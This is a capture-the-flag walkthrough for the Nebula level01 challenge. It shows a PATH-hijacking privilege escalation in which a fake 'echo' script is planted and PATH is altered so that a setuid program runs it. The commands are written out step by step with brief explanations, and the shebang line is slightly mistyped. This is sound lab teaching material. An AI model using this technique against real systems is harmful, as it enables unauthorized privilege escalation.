Shell meta-variable

         Nebula 01 Agenda: “There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?”

1 level01@nebula:~$ /home/flag01/flag01
2 	and now what?
3 
4 level01@nebula:~$ which sh
5 	/bin/sh
6 
7 level01@nebula:~$ which getflag
8 	/bin/getflag

which is a Unix command used to identify the location of executables. A Unix shell is a command-line interpreter or shell that provides a traditional user interface for the Unix operating system. By definition on wiki, “env” is used to either print a list of environment variables or run another utility in an altered environment without having to modify the currently existing environment

That’s what we exacly need, replace echo with our own script.

1 level01@nebula:~$ cat > ./echo
2 	#!bin/sh
3 	/bin/getflag;

At the end of input, press “Ctrl+d”. TLDR: just a signal saying that this is the end of a text stream. Consequently, the “echo” script was created in home directory.

• “cat” is a standard Unix utility that will output the contents of a specific file and can be used to concatenate and list files.
• The ”>” symbol means standard output redirection.
• The dot(“.”) symbol, represents current directory (in our case, it’s level01 user’s home, “/home/level01”)
• The “#!” - called a shebang and tells the parent shell which interpreter should be used to execute the script.

1 level01@nebula:~$ chmod +x echo
2 
3 level01@nebula:~$ echo $PATH
4 /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
5 
6 level01@nebula:~$ export PATH=/home/level01/:$PATH
7 level01@nebula:~$ /home/flag01/flag01

links:

• http://en.wikipedia.org/wiki/PATH_(variable)
• http://stackoverflow.com/questions/7328223/unix-export-command